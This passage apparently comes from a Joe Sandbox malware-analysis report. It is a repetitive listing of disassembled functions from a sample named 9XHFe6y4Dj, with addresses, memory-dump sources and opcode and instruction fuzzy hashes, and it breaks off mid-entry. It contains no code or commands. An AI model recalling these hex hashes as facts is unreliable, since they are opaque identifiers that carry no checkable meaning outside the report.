                                                            • Opcode Fuzzy Hash: 40016d272ed287881f3ac6b5babbb4b85292c9d235d26c6c87dfbecd8f38c478
                                                            • Instruction Fuzzy Hash: C3511731A1D7418FE368FB18A8550B677E1EFE6390F14053ED8CAC35C2DB29B846835A
                                                            Function 00007FF848FB974B Relevance: .2, Instructions: 173COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 168dd5cc85df3f4f8442cc5489242ab1743cc9baf0bbfa5d2419e844bd616f30
                                                            • Instruction ID: 24f4be17fbbe39ca5b53f9627180fdf2a3a8e9e9e42601eccdc99f6064b11aff
                                                            • Opcode Fuzzy Hash: 168dd5cc85df3f4f8442cc5489242ab1743cc9baf0bbfa5d2419e844bd616f30
                                                            • Instruction Fuzzy Hash: D451F531A1D6424FE77A7B28A4450B577E0EF66394F20097ED48AC39D3EF29F4028749
                                                            Function 00007FF848BF08D0 Relevance: .2, Instructions: 158COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2644593300.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848bf0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 320188fb99d12c18fed1b9e7d348ffd457431a447f273662c154e1945a2bdab6
                                                            • Instruction ID: dd9daf510a87e95626d32d8fccdb1844500a51b7eed154d210d4c7dedcdb3bed
                                                            • Opcode Fuzzy Hash: 320188fb99d12c18fed1b9e7d348ffd457431a447f273662c154e1945a2bdab6
                                                            • Instruction Fuzzy Hash: 9E415A22A0E9591EE704BB7C60D62F97790EF493A5F1441FBD28DC71D3DF2868818389
                                                            Function 00007FF848FB749F Relevance: .1, Instructions: 149COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9df694338893c1a0c2e92ba63c390d3c44ee3a1e7766f1685602cf38b4d4b2c5
                                                            • Instruction ID: 61bf6bfebc701bd9a4c0ec133ad80e886a2d609ce27b0d9d571ee255c84c8534
                                                            • Opcode Fuzzy Hash: 9df694338893c1a0c2e92ba63c390d3c44ee3a1e7766f1685602cf38b4d4b2c5
                                                            • Instruction Fuzzy Hash: 6E41AF32D0DA9A9FEB45EB68D8A05E87BB0FF15355F2800BAD04DD71C3DF28A8058759
                                                            Function 00007FF848FB97F3 Relevance: .1, Instructions: 149COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3cb7659ef77590309b34d80a128674318b6fcab82d45bae1177cedddd5a6d8c4
                                                            • Instruction ID: 0264a2978395aad8b1974a7da579d91d2cd7abcabbc8c28493a7eac34ce01fe1
                                                            • Opcode Fuzzy Hash: 3cb7659ef77590309b34d80a128674318b6fcab82d45bae1177cedddd5a6d8c4
                                                            • Instruction Fuzzy Hash: 4E41C131A1DA418FE36ABB24545517977E1EF65390F64047ED08FC35C3EF19B802875A
                                                            Function 00007FF848FB28E7 Relevance: .1, Instructions: 127COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 178f5f72eb64e72ad77e6d27dae37bc8eb432f43838a99da982f238ba9fd61a0
                                                            • Instruction ID: f23d1afc22e14fcd4d257e9a1fd8df4ea7d105d2ec97d4525d122c2e6512ba20
                                                            • Opcode Fuzzy Hash: 178f5f72eb64e72ad77e6d27dae37bc8eb432f43838a99da982f238ba9fd61a0
                                                            • Instruction Fuzzy Hash: 18418031A0C9099FDF88EF28C4A5DA4B3E1FB68710B0406A9D14EC3692CF34E855CF81
                                                            Function 00007FF848FBBF77 Relevance: .1, Instructions: 127COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6e7b7a2220a29d81796ae5d78c654284d51075a03fb3eb75a809b526d9bfd1b5
                                                            • Instruction ID: a2b4164eb11f482babe865dc16adcceac3a21f3d248056b06dc096fc48995279
                                                            • Opcode Fuzzy Hash: 6e7b7a2220a29d81796ae5d78c654284d51075a03fb3eb75a809b526d9bfd1b5
                                                            • Instruction Fuzzy Hash: A3415131A0C9499FDF88FF28D495DA5B3E1FB69321B0405AAD10AC3592DF24EC95CB81
                                                            Function 00007FF8493424F7 Relevance: .1, Instructions: 127COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 49b6f1e1d31fa93b148d4577bb714223dafcad960b0bff0d473252dafdb87ba1
                                                            • Instruction ID: b14a711f02fd1fbaf3a1796170214b932fd95eb983d6be6cb0bfde04dec3c94b
                                                            • Opcode Fuzzy Hash: 49b6f1e1d31fa93b148d4577bb714223dafcad960b0bff0d473252dafdb87ba1
                                                            • Instruction Fuzzy Hash: 12416031A0C9499FDF9CEF28C4959A5B7E1FB69320B0405ABD10EC3292DE31E895CB81
                                                            Function 00007FF848FB0176 Relevance: .1, Instructions: 120COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 97e1b7576a58e2a75c9a8122cba7518e934fbbe9cebbc0176ca5e90e175d3172
                                                            • Instruction ID: 652c4396802fd1a6d5949110d8a636b5b3e6f4ffaae4bb5a3e73f3a5282ff491
                                                            • Opcode Fuzzy Hash: 97e1b7576a58e2a75c9a8122cba7518e934fbbe9cebbc0176ca5e90e175d3172
                                                            • Instruction Fuzzy Hash: 1B31083191D7818FE369F76859550767BE1EFE6390F24047EE8CEC31D2DA187806835A
                                                            Function 00007FF848FB2991 Relevance: .1, Instructions: 120COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b81f385f125878b03270134c3e691ba91342213c480c14215d3179c9a21876d5
                                                            • Instruction ID: f1b6e030ee5100315dbed0594f9ff458734aad94719361d4ee15cd7efa427a8a
                                                            • Opcode Fuzzy Hash: b81f385f125878b03270134c3e691ba91342213c480c14215d3179c9a21876d5
                                                            • Instruction Fuzzy Hash: BA316F31A0C9499FDB88EF28C4A5EA4B7E1FB69710B0446ADD54EC7692CF34E845CF81
                                                            Function 00007FF848FBC021 Relevance: .1, Instructions: 120COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e9cfa2ae7c2edffac475547f76f38f18b56ea3c481dbba8bf7fbb60742158b49
                                                            • Instruction ID: c5387cdb30e2cc8ee9c2d495d3809bcb234dc3796a129143ec43adc618c39f22
                                                            • Opcode Fuzzy Hash: e9cfa2ae7c2edffac475547f76f38f18b56ea3c481dbba8bf7fbb60742158b49
                                                            • Instruction Fuzzy Hash: B8317031A0C9459FDF8CFF28C499DA573E1FB69311B0406AAD00AC7592DF24EC95CB81
                                                            Function 00007FF8493425A1 Relevance: .1, Instructions: 120COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5bb8dc71a850c1d149110044ffae9cd562068a1a42f7d618dad42af70f486331
                                                            • Instruction ID: 166e5b268edd2a396e77eb26a4b98434c5533b2c68e393140f08a22e5ff18e4d
                                                            • Opcode Fuzzy Hash: 5bb8dc71a850c1d149110044ffae9cd562068a1a42f7d618dad42af70f486331
                                                            • Instruction Fuzzy Hash: 47317231A0C9459FDF9CEF28C495EA5B7E1FB69310B0805AFD14AC7192CE34E895CB81
                                                            Function 00007FF848FB292B Relevance: .1, Instructions: 115COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 27101233bd0bca7bf956dc358ca084fa9c7e0286e1fd67d5589ed8c8ef39f2ea
                                                            • Instruction ID: 2da2e0c63a410cbc0da582dd4563b49e6fc2856938f3fa1f0583e2b5181c8d5b
                                                            • Opcode Fuzzy Hash: 27101233bd0bca7bf956dc358ca084fa9c7e0286e1fd67d5589ed8c8ef39f2ea
                                                            • Instruction Fuzzy Hash: F2314F3160C9499FDB98EF28C4A5DA4B3E1FB69710B0446ADD14EC7692CF34E885CF81
                                                            Function 00007FF848FBE3FA Relevance: .1, Instructions: 115COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8d3519e263b4b8b213ebb20b11cf2647fad21adb547c8a405fe50aef28d8e682
                                                            • Instruction ID: 4604a949ebdd44c26e9108443f8099b4b8a133460a2bd4beab9820324afa6a73
                                                            • Opcode Fuzzy Hash: 8d3519e263b4b8b213ebb20b11cf2647fad21adb547c8a405fe50aef28d8e682
                                                            • Instruction Fuzzy Hash: 9431AF31D0DA8A9FDB46EBA8C8604ECBFB1FF15354F1400BAD049DB1D2DB2968158754
                                                            Function 00007FF848FBBFBB Relevance: .1, Instructions: 115COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 828f199a83004f8e0adb14e63e49c037002591e8f8faaccc9bfccce2179bda3b
                                                            • Instruction ID: a2326c516c897fbbe5716c4ff0dc019e0511ce99f3736d6b83d4b5e13ca12ec9
                                                            • Opcode Fuzzy Hash: 828f199a83004f8e0adb14e63e49c037002591e8f8faaccc9bfccce2179bda3b
                                                            • Instruction Fuzzy Hash: 6D313E31A0C9499FDF9CFF28C499DA5B3E1FB69311B1405AAD00AC7692DF24EC95CB81
                                                            Function 00007FF8493456D3 Relevance: .1, Instructions: 115COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 08aa8e94453ba04a89074a8ecb99fbbaf23a4b2ce291157479991c9704f71fdc
                                                            • Instruction ID: 5f7eb50af90d587321749838cff62905e541c3d4f8e716e749737c510a0b13b6
                                                            • Opcode Fuzzy Hash: 08aa8e94453ba04a89074a8ecb99fbbaf23a4b2ce291157479991c9704f71fdc
                                                            • Instruction Fuzzy Hash: 3A319C31D1DACEDFDB55EB6898505EDBBB0FF46380F1500BAD00AD7192DA2868158751
                                                            Function 00007FF84934253B Relevance: .1, Instructions: 115COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2c6dd003906b69631ac4245166afa4d453e8f980db87280fe205d1e222ae20dc
                                                            • Instruction ID: 62d965782017cadc9313defa737b47eafd10d6948af39b53aced9f635fb12d20
                                                            • Opcode Fuzzy Hash: 2c6dd003906b69631ac4245166afa4d453e8f980db87280fe205d1e222ae20dc
                                                            • Instruction Fuzzy Hash: 23316131A0C949DFDF9CEF28C095EA5B7E1FB69310B0405ABD10AC7692DE34E895CB81
                                                            Function 00007FF848BF0960 Relevance: .1, Instructions: 115COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2644593300.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848bf0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5ada1bb3f722d91a6e6d188f850ce6d4ee6ace7ff14d9d97987dd03ff97bc11d
                                                            • Instruction ID: 5c06c866b55f6ef2ce053cad84b31492129ffd2ae2e34927c69519cde46f0726
                                                            • Opcode Fuzzy Hash: 5ada1bb3f722d91a6e6d188f850ce6d4ee6ace7ff14d9d97987dd03ff97bc11d
                                                            • Instruction Fuzzy Hash: C6314C22A1D9591FF748B77C649A6F873C1FF493A1F1440BAD64DC31D3CE28AC814299
                                                            Function 00007FF848BF11A1 Relevance: .1, Instructions: 110COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2644593300.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848bf0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 11872c2b22caeb3d39158e6d557b1c49ba22be13f68ac3dac7a3c2dd27ed5252
                                                            • Instruction ID: cb58f11efd017fdb782a443f0e2dcc79bad41bca4d34f4344e77e4b4df538a32
                                                            • Opcode Fuzzy Hash: 11872c2b22caeb3d39158e6d557b1c49ba22be13f68ac3dac7a3c2dd27ed5252
                                                            • Instruction Fuzzy Hash: E031C33090D68A8FDF46FB78C8599B97BF0FF16350F0509BAD149C76A2DB28A845CB50
                                                            Function 00007FF8493472CD Relevance: .1, Instructions: 103COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4a6b439bba3c7940789326c46fda68dce14b110d29b8404543edf3854764f53a
                                                            • Instruction ID: 43850e6af9249c838444a74c435dc16a59355554fe67785faf6ab471df8270e2
                                                            • Opcode Fuzzy Hash: 4a6b439bba3c7940789326c46fda68dce14b110d29b8404543edf3854764f53a
                                                            • Instruction Fuzzy Hash: BD314D31A0C94A8FDB58EF5C94919B8B7E2FF8A354B115279C01ED3681DF24B8128BC1
                                                            Function 00007FF848BF0998 Relevance: .1, Instructions: 99COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2644593300.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848bf0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 65ee331bea70dbdef608b29a43f834eb7244897bcb574a41da7d4b21c2e00452
                                                            • Instruction ID: c05848267525111b6fadaae03abc98aa1e64377b3fd2e41421c99772c2c4332c
                                                            • Opcode Fuzzy Hash: 65ee331bea70dbdef608b29a43f834eb7244897bcb574a41da7d4b21c2e00452
                                                            • Instruction Fuzzy Hash: 13213520B1C9491FE788F72C845A6B977C2EF99791F1000BCE68EC32D3DE25AC818685
                                                            Function 00007FF848FBBD85 Relevance: .1, Instructions: 98COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8d93a914703b95ccf67ec5fe91d6d02514db04f6bf4987788d83c9b59d477d7e
                                                            • Instruction ID: 9d6da73c2cefefef34a2bd0d12ce6e32463312c55878efca741d22c388d2e371
                                                            • Opcode Fuzzy Hash: 8d93a914703b95ccf67ec5fe91d6d02514db04f6bf4987788d83c9b59d477d7e
                                                            • Instruction Fuzzy Hash: 54312730E2C94ACFEB98EB54C4956BD77B1FF68340F50007AE10ED65D1DB39AA409B89
                                                            Function 00007FF848BF0C25 Relevance: .1, Instructions: 97COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2644593300.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848bf0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dba3165c5f8a73d383a2b46b0ca5982158662d2297a614a3ec67ff61757ac499
                                                            • Instruction ID: c1fe585e0e55e19060e9a8d0b2a777b406fa0386d69ca1213ef62ed003681348
                                                            • Opcode Fuzzy Hash: dba3165c5f8a73d383a2b46b0ca5982158662d2297a614a3ec67ff61757ac499
                                                            • Instruction Fuzzy Hash: CC313B72D0DA899EE701BB6898452EC7BB0FF41351F1442B6D248CB1D3DF38244AC755
                                                            Function 00007FF848FB90ED Relevance: .1, Instructions: 96COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a5d9dbe5f4200f19a1770c932e59d96ba413fbb5955c50f7148dab25d8929c5b
                                                            • Instruction ID: d8eb4895d78d0b2ccae3dec1d721c0cc814cef2524722171f7146c22a38d33da
                                                            • Opcode Fuzzy Hash: a5d9dbe5f4200f19a1770c932e59d96ba413fbb5955c50f7148dab25d8929c5b
                                                            • Instruction Fuzzy Hash: EB312B71F1C90A8FDB49EB58D4919A8F7A2FF69350B548139D00ED7AC2DF24B852CB84
                                                            Function 00007FF848FB26F5 Relevance: .1, Instructions: 95COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 168e944699263711bb886608c0d602c6414572e49af4783354d00719071b1716
                                                            • Instruction ID: b13201ec7d2cb1baf7c35a1425c95aee328145c8b6bd3e037e8b5afc3766e3d3
                                                            • Opcode Fuzzy Hash: 168e944699263711bb886608c0d602c6414572e49af4783354d00719071b1716
                                                            • Instruction Fuzzy Hash: 72311830D1C94ACFEB98EB9488955BE7BA2FF68340F6001BAD40ED65C1CB386840D789
                                                            Function 00007FF849342305 Relevance: .1, Instructions: 95COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7b9164b75671c203be4a77ac6c84fb217a4ffc736237559ab8cc4c427cd74647
                                                            • Instruction ID: 5f0f130f218ee3ea5b0951c430e17c1d5e30e774951e45332aa94cfd1eb0d50a
                                                            • Opcode Fuzzy Hash: 7b9164b75671c203be4a77ac6c84fb217a4ffc736237559ab8cc4c427cd74647
                                                            • Instruction Fuzzy Hash: 8B313830D0CA8ACFEBA8EF1484555BD7BB0FF5A390F5610BAD40EE6191DB38A8409F41
                                                            Function 00007FF8493473A3 Relevance: .1, Instructions: 90COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1da65ac84c9f773bdba3a7afebc0d878682f8333fbd2b97f339311098a5813c0
                                                            • Instruction ID: e725d95bbcc3e9c24f3b757e214d15d1cbf50e5c73d7ab9f93082856161370e4
                                                            • Opcode Fuzzy Hash: 1da65ac84c9f773bdba3a7afebc0d878682f8333fbd2b97f339311098a5813c0
                                                            • Instruction Fuzzy Hash: 90212831E1CACA4FE765FB6858522B8BBD1EF87390F151179D14EC36C3EE1868058781
                                                            Function 00007FF848BF5E63 Relevance: .1, Instructions: 87COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2644593300.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848bf0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 92f9462164c3b68588bc11e429528232fabadaefa02f1f948e1117d76db0f044
                                                            • Instruction ID: 6c38fc5d7f60626a440fb112e12616e7109ddfd76c7aa7e6e859e624bc9569aa
                                                            • Opcode Fuzzy Hash: 92f9462164c3b68588bc11e429528232fabadaefa02f1f948e1117d76db0f044
                                                            • Instruction Fuzzy Hash: B4217130E1C80A4FEB94F72898556B873D1FF58381F4441B5D68ED36A2EF286C468B48
                                                            Function 00007FF8493411F0 Relevance: .1, Instructions: 86COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a179e1a4591e17720097dc28fa5a33c926413fd636ba1cb21116f452b78c7fa0
                                                            • Instruction ID: 4b0262344717b267f34a8272623b1521d2ffcf1d85d0f2f284fff41df962f536
                                                            • Opcode Fuzzy Hash: a179e1a4591e17720097dc28fa5a33c926413fd636ba1cb21116f452b78c7fa0
                                                            • Instruction Fuzzy Hash: 2431392091C9F68FE739AA5484649B47B52FF63345B1D4AFBD09ACB4C7D81CBD818341
                                                            Function 00007FF848FB15E3 Relevance: .1, Instructions: 85COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 20f7aab4a04de4eb99c942d176314d583e163ecfbbe8e0a3ca1ac48e0ac4acdb
                                                            • Instruction ID: b1a702c1e72bdc04d4154eb37eb8aa9d8b620687c0f1b3893dab14507af15c4f
                                                            • Opcode Fuzzy Hash: 20f7aab4a04de4eb99c942d176314d583e163ecfbbe8e0a3ca1ac48e0ac4acdb
                                                            • Instruction Fuzzy Hash: C631362091D5D78EE32BA71844745747B92EF62340F1C4AFAD09BCB4DFEA2CA8C19345
                                                            Function 00007FF848FBAC70 Relevance: .1, Instructions: 85COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 50c107e53505d41becc19420572b746b92a8dadb335f7a591709251438d6f58d
                                                            • Instruction ID: 0e7768a6ab06324d8641d7479a880743640770c0b225a8d72bf6367fce4edf39
                                                            • Opcode Fuzzy Hash: 50c107e53505d41becc19420572b746b92a8dadb335f7a591709251438d6f58d
                                                            • Instruction Fuzzy Hash: 9231473091E5E64FE72AA31844646B47B61EF66341F1C46BBC49BCB0D7DA2CA8C1C789
                                                            Function 00007FF848FB8082 Relevance: .1, Instructions: 83COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
